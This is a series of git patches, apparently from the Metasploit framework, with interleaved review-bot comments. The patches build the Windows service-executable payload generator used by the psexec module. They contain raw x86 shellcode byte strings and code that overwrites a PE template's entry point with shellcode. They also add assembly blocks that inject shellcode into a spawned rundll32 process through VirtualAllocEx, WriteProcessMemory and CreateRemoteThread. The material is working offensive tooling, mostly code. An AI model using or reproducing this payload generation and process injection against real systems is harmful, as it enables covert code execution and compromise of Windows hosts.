"\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" + - "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" - - pe_header_size = 0x18 - section_size = 0x28 - characteristics_offset = 0x24 - virtualAddress_offset = 0x0c - sizeOfRawData_offset = 0x10 - - sections_table_rva = - exe._dos_header.v['e_lfanew'] + - exe._file_header.v['SizeOfOptionalHeader'] + - pe_header_size - - sections_table_offset = exe.rva_to_file_offset(sections_table_rva) - - sections_table_characteristics_offset = - 
exe.rva_to_file_offset(sections_table_rva + characteristics_offset) - - sections_header = [] - exe._file_header.v['NumberOfSections'].times { |i| - section_offset = sections_table_offset + (i * section_size) - sections_header << [ - sections_table_characteristics_offset + (i * section_size), - pe[section_offset,section_size] - ] - } - - # look for section with entry point - sections_header.each do |sec| - virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0] - sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0] - characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0] - - if (virtualAddress...virtualAddress+sizeOfRawData).include?(exe.hdr.opt.AddressOfEntryPoint) - # put this section writable - characteristics |= 0x8000_0000 - newcharacteristics = [characteristics].pack('L') - pe[sec[0],newcharacteristics.length] = newcharacteristics - end + if name + bo = pe.index('SERVICENAME') + raise RuntimeError, "Invalid PE Service EXE template: missing \"SERVICENAME\" tag" if not bo + pe[bo, 11] = [name].pack('a11') end - # put the shellcode at the entry point, overwriting template - entryPoint_file_offset = exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint) - my_payload_length = code_service.length + code.length - payload_service = code_service + code - pe[entryPoint_file_offset,my_payload_length] = payload_service - + if not opts[:sub_method] + pe[136, 4] = [rand(0x100000000)].pack('V') + end when :dll max_length = 2048 when :exe_sub max_length = 4096 end - if opts[:exe_type] != :service_exe + bo = pe.index('PAYLOAD:') + raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo - bo = pe.index('PAYLOAD:') - raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo - - if (code.length <= max_length) - pe[bo, code.length] = [code].pack("a*") - else - raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module" - end + if 
(code.length <= max_length) + pe[bo, code.length] = [code].pack("a*") + else + raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module" + end if opts[:exe_type] == :dll mt = pe.index('MUTEX!!!') 
@@ -548,10 +506,39 @@ require 'msf/core/exe/segment_injector' end def self.to_win32pe_service(framework, code, opts={}) - # Allow the user to specify their own service EXE template - set_template_default(opts, "template_x86_windows.exe") - opts[:exe_type] = :service_exe - exe_sub_method(code,opts) + if opts[:sub_method] + # Allow the user to specify their own service EXE template + set_template_default(opts, "template_x86_windows_svc.exe") + opts[:exe_type] = :service_exe + exe_sub_method(code,opts) + else + name = opts[:servicename] + name ||= Rex::Text.rand_text_alpha(7) + pushed_service_name = string_to_pushes(name) + + # code_service could be encoded in the future + code_service = + "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + + "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + + "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" + + "\x26\x07\xFF\xD5"+pushed_service_name+"\x89\xE1" + + "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" + + "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" + + "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" + + "\x00\x00\x00"+pushed_service_name+"\x89\xE1\x8D" + + "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" + + "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" + + "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" + + to_winpe_only(framework, code_service + code, opts) + end end def 
self.to_win64pe_service(framework, code, opts={}) From 5ecebc3427268d090a2e0dc46a308b1fb3c66b7b Mon Sep 17 00:00:00 2001 From: Florian Gaultier Date: Thu, 26 Dec 2013 14:36:26 +0100 Subject: [PATCH 294/853] Add options `SERVICE_NAME` and `SERVICE_DISPLAYNAME` to psexec and correct service payload generation --- lib/msf/util/exe.rb | 45 +++++++++++++++----------- modules/exploits/windows/smb/psexec.rb | 7 ++-- 2 files changed, 32 insertions(+), 20 deletions(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 80314f3f83..e52fc625a4 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -299,7 +299,6 @@ require 'msf/core/exe/segment_injector' end def self.to_winpe_only(framework, code, opts={}, arch="x86") - if arch == ARCH_X86_64 arch = ARCH_X64 end @@ -310,9 +309,9 @@ require 'msf/core/exe/segment_injector' pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true) exe = '' - File.open(opts[:template], 'rb') { |fd| - exe = fd.read(fd.stat.size) - } + File.open(opts[:template], 'rb') { |fd| + exe = fd.read(fd.stat.size) + } pe_header_size = 0x18 section_size = 0x28 @@ -356,7 +355,6 @@ require 'msf/core/exe/segment_injector' # put the shellcode at the entry point, overwriting template entryPoint_file_offset = pe.rva_to_file_offset(pe.hdr.opt.AddressOfEntryPoint) exe[entryPoint_file_offset,code.length] = code - return exe end @@ -406,7 +404,8 @@ require 'msf/core/exe/segment_injector' return pe end - def self.string_to_pushes(str) + def self.string_to_pushes(string) + str = string.dup # Align string to 4 bytes rem = (str.length) % 4 if (rem > 0) 
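Review bot: The `code_service` byte string added to `to_win32pe_service` carries no comment saying where it comes from, so the bytes cannot be checked against a source or regenerated when they need to change. A comment above the assignment naming the assembly source and build step would close that gap, e.g. `# Assembled from external/source/shellcode/windows/x86/src/single/single_service_stuff.asm (confirm path and build command)`. That path is taken from a later patch in this series and should be verified against the tree at this commit. The existing comment `# code_service could be encoded in the future` does not cover provenance.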
@@ -510,12 +509,21 @@ require 'msf/core/exe/segment_injector' # Allow the user to specify their own service EXE template set_template_default(opts, "template_x86_windows_svc.exe") opts[:exe_type] = :service_exe - exe_sub_method(code,opts) + return exe_sub_method(code,opts) else name = opts[:servicename] - name ||= Rex::Text.rand_text_alpha(7) + name ||= Rex::Text.rand_text_alpha(8) pushed_service_name = string_to_pushes(name) + precode_size = 0xc6 + svcmain_code_offset = precode_size + pushed_service_name.length + + precode_size += 0x06 + hash_code_offset = precode_size + pushed_service_name.length + + precode_size -= 0x0d + svcctrlhandler_code_offset = precode_size + pushed_service_name.length + # code_service could be encoded in the future code_service = "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + @@ -528,16 +536,17 @@ require 'msf/core/exe/segment_injector' "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" + - "\x26\x07\xFF\xD5"+pushed_service_name+"\x89\xE1" + - "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" + - "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" + - "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" + - "\x00\x00\x00"+pushed_service_name+"\x89\xE1\x8D" + - "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" + - "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" + - "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" - - to_winpe_only(framework, code_service + code, opts) + "\x26\x07\xFF\xD5"+pushed_service_name+"\x89\xE1\x8D\x85" + + [svcmain_code_offset].pack(' Date: Thu, 2 Jan 2014 20:22:20 +0100 Subject: [PATCH 295/853] Change author of single_service_stuff.asm --- .../shellcode/windows/x86/src/single/single_service_stuff.asm | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm index e5aad30bcf..e63119c276 100644 --- a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm +++ b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm @@ -1,5 +1,5 @@ ;-----------------------------------------------------------------------------; -; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Author: agix (florian.gaultier[at]gmail[dot]com) ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 ; Version: 1.0 (28 July 2009) ; Size: 189 bytes + strlen(libpath) + 1 From 25d48b73009aca99a6665c10cec07d3d621b3de2 Mon Sep 17 00:00:00 2001 From: Florian Gaultier Date: Fri, 3 Jan 2014 12:16:37 +0100 Subject: [PATCH 296/853] Add create_remote_process block, now used in exe_service generation --- .../src/block/block_create_remote_process.asm | 82 +++++++++++++++++++ .../single/single_create_remote_process.asm | 17 ++++ .../x86/src/single/single_service_stuff.asm | 3 +- lib/msf/util/exe.rb | 32 +++++--- 4 files changed, 123 insertions(+), 11 deletions(-) create mode 100644 external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm create mode 100644 external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm diff --git a/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm new file mode 100644 index 0000000000..d28a4eee10 --- /dev/null +++ b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm 
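Review bot: Only the `Author:` line changes, so the header now credits a new author while still carrying `Version: 1.0 (28 July 2009)` and `Size: 189 bytes + strlen(libpath) + 1`, which look carried over from the file this header was copied from. Those two lines should be updated to describe this file or dropped. If any of the file's content still derives from the original author's work, that credit should stay alongside the new one, e.g. `; Based on: <original file> by <original author>` (placeholders).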
@@ -0,0 +1,82 @@ +;-----------------------------------------------------------------------------; +; Author: agix (florian.gaultier[at]gmail[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Size: 137 bytes +;-----------------------------------------------------------------------------; + +[BITS 32] +; Input: EBP must be the address of 'api_call'. + +xor edi, edi +push 0x00000004 ;PAGE_READWRITE +push 0x00001000 ;MEM_COMMIT +push 0x00000054 ;STARTUPINFO+PROCESS_INFORMATION +push edi +push 0xE553A458 ;call VirtualAlloc() +call ebp + +mov dword [eax], 0x44 +lea esi, [eax+0x44] +push edi +push 0x6578652e +push 0x32336c6c +push 0x646e7572 +mov ecx, esp ;"rundll32.exe" +push esi ;lpProcessInformation +push eax ;lpStartupInfo +push edi ;lpCurrentDirectory +push edi ;lpEnvironment +push 0x00000044 ;dwCreationFlags +push edi ;bInheritHandles +push edi ;lpThreadAttributes +push edi ;lpProcessAttributes +push ecx ;lpCommandLine +push edi ;lpApplicationName +push 0x863FCC79 +call ebp ;call CreatProcessA() + +mov ecx, [esi] +push 0x00000040 ;PAGE_EXECUTE_READWRITE +push 0x00001000 ;MEM_COMMIT +push 0x00001000 ;Next Shellcode Size +push edi +push ecx ;hProcess +push 0x3F9287AE ;call VirtualAllocEx() +call ebp + +mov edi, eax +mov ecx, [esi] +lea edx, [ebp+0x12a] ;pointer on the next shellcode +push esp +push 0x00001000 ;Next Shellcode Size +push edx ; +push eax ;lBaseAddress +push ecx ;hProcess +push 0xE7BDD8C5 +call ebp ;call WriteProcessMemory() + +xor eax, eax +mov ecx, [esi] +push eax ;lpThreadId +push eax ;dwCreationFlags +push eax ;lpParameter +push edi ;lpStartAddress +push eax ;dwStackSize +push eax ;lpThreadAttributes +push ecx ;hProcess +push 0x799AACC6 +call ebp ;call CreateRemoteThread() + +mov ecx, [esi] +push ecx +push 0x528796C6 +call ebp ;call CloseHandle() + +mov ecx, [esi+0x4] +push ecx +push 0x528796C6 +call ebp ;call CloseHandle() + +push edi +push 0x56A2B5F0 +call ebp ;call ExitProcess(0) \ No newline at end of file 
diff --git a/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm b/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm new file mode 100644 index 0000000000..1b73bb1abc --- /dev/null +++ b/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm @@ -0,0 +1,17 @@ +;-----------------------------------------------------------------------------; +; Author: agix (florian.gaultier[at]gmail[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (28 July 2009) +; Size: 189 bytes + strlen(libpath) + 1 +; Build: >build.py single_create_remote_process +;-----------------------------------------------------------------------------; + +[BITS 32] +[ORG 0] + + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. +%include "./src/block/block_api.asm" +start: ; + pop ebp ; pop off the address of 'api_call' for calling later. +%include "./src/block/block_create_remote_process.asm" \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm index e63119c276..40cd4cd111 100644 --- a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm +++ b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm @@ -14,4 +14,5 @@ %include "./src/block/block_api.asm" start: ; pop ebp ; pop off the address of 'api_call' for calling later. -%include "./src/block/block_service.asm" \ No newline at end of file +%include "./src/block/block_service.asm" +%include "./src/block/block_create_remote_process.asm" \ No newline at end of file diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index e52fc625a4..ea17a5bb19 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb 
@@ -524,6 +524,9 @@ require 'msf/core/exe/segment_injector' precode_size -= 0x0d svcctrlhandler_code_offset = precode_size + pushed_service_name.length + precode_size += 0xe4 + shellcode_code_offset = precode_size + (pushed_service_name.length * 2) + # code_service could be encoded in the future code_service = "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + @@ -536,16 +539,25 @@ require 'msf/core/exe/segment_injector' "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" + - "\x26\x07\xFF\xD5"+pushed_service_name+"\x89\xE1\x8D\x85" + - [svcmain_code_offset].pack(' Date: Fri, 3 Jan 2014 13:27:39 +0100 Subject: [PATCH 297/853] Improve block_create_remote_process to point on shellcode everytime --- .../x86/src/block/block_create_remote_process.asm | 10 +++++++--- .../windows/x86/src/block/block_service.asm | 2 +- .../src/single/single_create_remote_process.asm | 3 +-- .../x86/src/single/single_service_stuff.asm | 3 +-- lib/msf/util/exe.rb | 14 ++++++-------- 5 files changed, 16 insertions(+), 16 deletions(-) diff --git a/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm index d28a4eee10..578ecd32a4 100644 --- a/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm +++ b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm @@ -1,7 +1,7 @@ ;-----------------------------------------------------------------------------; ; Author: agix (florian.gaultier[at]gmail[dot]com) ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 -; Size: 137 bytes +; Size: 307 bytes ;-----------------------------------------------------------------------------; [BITS 32] 
@@ -44,9 +44,13 @@ push ecx ;hProcess push 0x3F9287AE ;call VirtualAllocEx() call ebp +call me2 +me2: +pop edx + mov edi, eax mov ecx, [esi] -lea edx, [ebp+0x12a] ;pointer on the next shellcode +lea edx, [edx+0x47] ;pointer on the next shellcode push esp push 0x00001000 ;Next Shellcode Size push edx ; @@ -79,4 +83,4 @@ call ebp ;call CloseHandle() push edi push 0x56A2B5F0 -call ebp ;call ExitProcess(0) \ No newline at end of file +call ebp ;call ExitProcess(0) diff --git a/external/source/shellcode/windows/x86/src/block/block_service.asm b/external/source/shellcode/windows/x86/src/block/block_service.asm index cae63fcd34..2ba827b154 100644 --- a/external/source/shellcode/windows/x86/src/block/block_service.asm +++ b/external/source/shellcode/windows/x86/src/block/block_service.asm @@ -1,7 +1,7 @@ ;-----------------------------------------------------------------------------; ; Author: agix (florian.gaultier[at]gmail[dot]com) ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 -; Size: 137 bytes +; Size: 448 bytes ;-----------------------------------------------------------------------------; [BITS 32] diff --git a/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm b/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm index 1b73bb1abc..2c44b3dbad 100644 --- a/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm +++ b/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm @@ -1,8 +1,7 @@ ;-----------------------------------------------------------------------------; ; Author: agix (florian.gaultier[at]gmail[dot]com) ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 -; Version: 1.0 (28 July 2009) -; Size: 189 bytes + strlen(libpath) + 1 +; Size: 307 bytes ; Build: >build.py single_create_remote_process ;-----------------------------------------------------------------------------; 
diff --git a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm index 40cd4cd111..5c848922ce 100644 --- a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm +++ b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm @@ -1,8 +1,7 @@ ;-----------------------------------------------------------------------------; ; Author: agix (florian.gaultier[at]gmail[dot]com) ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 -; Version: 1.0 (28 July 2009) -; Size: 189 bytes + strlen(libpath) + 1 +; Size: 448 bytes ; Build: >build.py single_service_stuff ;-----------------------------------------------------------------------------; diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index ea17a5bb19..3413c4ebc1 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -524,9 +524,6 @@ require 'msf/core/exe/segment_injector' precode_size -= 0x0d svcctrlhandler_code_offset = precode_size + pushed_service_name.length - precode_size += 0xe4 - shellcode_code_offset = precode_size + (pushed_service_name.length * 2) - # code_service could be encoded in the future code_service = "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + @@ -552,11 +549,12 @@ require 'msf/core/exe/segment_injector' "\x6C\x6C\x33\x32\x68\x72\x75\x6E\x64\x89\xE1\x56\x50\x57\x57\x6A" + "\x44\x57\x57\x57\x51\x57\x68\x79\xCC\x3F\x86\xFF\xD5\x8B\x0E\x6A" + "\x40\x68\x00\x10\x00\x00\x68"+[code.length].pack(' Date: Fri, 3 Jan 2014 15:12:25 +0100 Subject: [PATCH 298/853] Improve service_block with service_stopped block to cleanly terminate service --- .../src/block/block_create_remote_process.asm | 8 ++---- .../x86/src/single/single_service_stuff.asm | 7 ++++- lib/msf/util/exe.rb | 26 ++++++++++++++----- 3 files changed, 28 insertions(+), 13 deletions(-) 
diff --git a/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm index 578ecd32a4..50252ad53e 100644 --- a/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm +++ b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm @@ -50,7 +50,7 @@ pop edx mov edi, eax mov ecx, [esi] -lea edx, [edx+0x47] ;pointer on the next shellcode +add dword edx, 0x112247 ;pointer on the next shellcode push esp push 0x00001000 ;Next Shellcode Size push edx ; @@ -79,8 +79,4 @@ call ebp ;call CloseHandle() mov ecx, [esi+0x4] push ecx push 0x528796C6 -call ebp ;call CloseHandle() - -push edi -push 0x56A2B5F0 -call ebp ;call ExitProcess(0) +call ebp ;call CloseHandle() \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm index 5c848922ce..fe3a8aa3a0 100644 --- a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm +++ b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm @@ -14,4 +14,9 @@ start: ; pop ebp ; pop off the address of 'api_call' for calling later. %include "./src/block/block_service.asm" -%include "./src/block/block_create_remote_process.asm" \ No newline at end of file +%include "./src/block/block_create_remote_process.asm" +%include "./src/block/block_service_stopped.asm" + +push edi +push 0x56A2B5F0 +call ebp ;call ExitProcess(0) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 3413c4ebc1..d7d9a0944c 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb 
@@ -345,6 +345,9 @@ require 'msf/core/exe/segment_injector' characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0] if (virtualAddress...virtualAddress+sizeOfRawData).include?(pe.hdr.opt.AddressOfEntryPoint) + if sizeOfRawData Date: Sat, 4 Jan 2014 21:11:53 +0100 Subject: [PATCH 299/853] Prevent import table overwritting by shifting entry point --- lib/msf/util/exe.rb | 23 ++++++++++++++--------- 1 file changed, 14 insertions(+), 9 deletions(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index d7d9a0944c..570d66f98f 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -314,20 +314,18 @@ require 'msf/core/exe/segment_injector' } pe_header_size = 0x18 + entryPoint_offset = 0x28 section_size = 0x28 characteristics_offset = 0x24 virtualAddress_offset = 0x0c sizeOfRawData_offset = 0x10 - sections_table_rva = + sections_table_offset = pe._dos_header.v['e_lfanew'] + pe._file_header.v['SizeOfOptionalHeader'] + pe_header_size - sections_table_offset = pe.rva_to_file_offset(sections_table_rva) - - sections_table_characteristics_offset = - pe.rva_to_file_offset(sections_table_rva + characteristics_offset) + sections_table_characteristics_offset = sections_table_offset + characteristics_offset sections_header = [] pe._file_header.v['NumberOfSections'].times { |i| 
@@ -338,15 +336,22 @@ require 'msf/core/exe/segment_injector' ] } + addressOfEntryPoint = pe.hdr.opt.AddressOfEntryPoint + # look for section with entry point sections_header.each do |sec| virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0] sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0] characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0] - if (virtualAddress...virtualAddress+sizeOfRawData).include?(pe.hdr.opt.AddressOfEntryPoint) - if sizeOfRawData Date: Mon, 6 Jan 2014 17:26:35 +0100 Subject: [PATCH 300/853] up block_service_stopped.asm --- .../x86/src/block/block_service_stopped.asm | 45 +++++++++++++++++++ lib/msf/util/exe.rb | 2 +- 2 files changed, 46 insertions(+), 1 deletion(-) create mode 100644 external/source/shellcode/windows/x86/src/block/block_service_stopped.asm diff --git a/external/source/shellcode/windows/x86/src/block/block_service_stopped.asm b/external/source/shellcode/windows/x86/src/block/block_service_stopped.asm new file mode 100644 index 0000000000..15d82b9ef7 --- /dev/null +++ b/external/source/shellcode/windows/x86/src/block/block_service_stopped.asm 
@@ -0,0 +1,45 @@ +;-----------------------------------------------------------------------------; +; Author: agix (florian.gaultier[at]gmail[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Size: 448 bytes +;-----------------------------------------------------------------------------; + +[BITS 32] +; Input: EBP must be the address of 'api_call'. + +call me2 +me2: +pop edi +jmp 0x7 +pop eax +pop eax +pop eax +pop eax +xor eax,eax +ret +push 0x00464349 +push 0x56524553 +mov ecx, esp ;SVCNAME +lea eax, [edi+0x3];SvcCtrlHandler +push 0x00000000 +push eax +push ecx +push 0x5244AA0B +call ebp ;RegisterServiceCtrlHandlerExA +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000001 +push 0x00000010 +mov ecx, esp +push 0x00000000 +push ecx +push eax +push 0x7D3755C6 +call ebp ;SetServiceStatus RUNNING +push 0x0 +push 0x56a2b5f0 +call ebp ;ExitProcess \ No newline at end of file diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 570d66f98f..ec12f16ef7 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -346,7 +346,7 @@ require 'msf/core/exe/segment_injector' if (virtualAddress...virtualAddress+sizeOfRawData).include?(addressOfEntryPoint) importsTable = pe.hdr.opt.DataDirectory[8..(8+4)].unpack('L')[0] - if (importsTable-addressOfEntryPoint) Date: Mon, 6 Jan 2014 19:18:43 +0100 Subject: [PATCH 301/853] Try to add SERVICE_DESCRIPTION options to psexec, but it doesn't seem to work... --- .../block_service_change_description.asm | 37 +++++++++++++++++++ .../x86/src/block/block_service_stopped.asm | 4 +- .../x86/src/single/single_service_stuff.asm | 1 + lib/msf/util/exe.rb | 17 ++++++++- modules/exploits/windows/smb/psexec.rb | 3 +- 5 files changed, 58 insertions(+), 4 deletions(-) create mode 100644 external/source/shellcode/windows/x86/src/block/block_service_change_description.asm 
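Review bot: Two comments in the new block_service_stopped.asm do not match the code beside them. The header line `; Size: 448 bytes` is the same figure given for single_service_stuff.asm and is unlikely to describe this much shorter block. The last SetServiceStatus call is labelled `RUNNING`, although the structure pushed before it carries `0x00000001` in its second field, which is the stopped state (SERVICE_STOPPED) that the file name refers to. I would relabel it `;SetServiceStatus SERVICE_STOPPED` and correct or drop the size line, so that anyone analysing this stub or writing a detection for it is not misled by the comments.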
diff --git a/external/source/shellcode/windows/x86/src/block/block_service_change_description.asm b/external/source/shellcode/windows/x86/src/block/block_service_change_description.asm new file mode 100644 index 0000000000..5f6b939222 --- /dev/null +++ b/external/source/shellcode/windows/x86/src/block/block_service_change_description.asm @@ -0,0 +1,37 @@ +;-----------------------------------------------------------------------------; +; Author: agix (florian.gaultier[at]gmail[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Size: 448 bytes +;-----------------------------------------------------------------------------; + +[BITS 32] +; Input: EBP must be the address of 'api_call'. + +push 0x000F01FF +push 0x00000000 +push 0x00000000 +push 0x7636F067 +call ebp ;OpenSCManagerA +mov edi, eax +push 0x00464349 +push 0x56524553 +mov ecx, esp ;SVCNAME +push 0x000F01FF +push ecx +push eax +push 0x404B2856 +call ebp ;OpenServiceA +mov esi, eax +push 0x00464349 +push 0x56524553 +mov ecx, esp ;SVCDESCRIPTION +push 0x00000001 ;SERVICE_CONFIG_DESCRIPTION +push eax +push 0xED35B087 +call ebp ;ChangeServiceConfig2A +push esi +push 0xAD77EADE ;CloseServiceHandle +call ebp +push edi +push 0xAD77EADE ;CloseServiceHandle +call ebp \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/block/block_service_stopped.asm b/external/source/shellcode/windows/x86/src/block/block_service_stopped.asm index 15d82b9ef7..10c8374c32 100644 --- a/external/source/shellcode/windows/x86/src/block/block_service_stopped.asm +++ b/external/source/shellcode/windows/x86/src/block/block_service_stopped.asm @@ -7,8 +7,8 @@ [BITS 32] ; Input: EBP must be the address of 'api_call'. -call me2 -me2: +call me3 +me3: pop edi jmp 0x7 pop eax diff --git a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm index fe3a8aa3a0..2de5d9a021 100644 
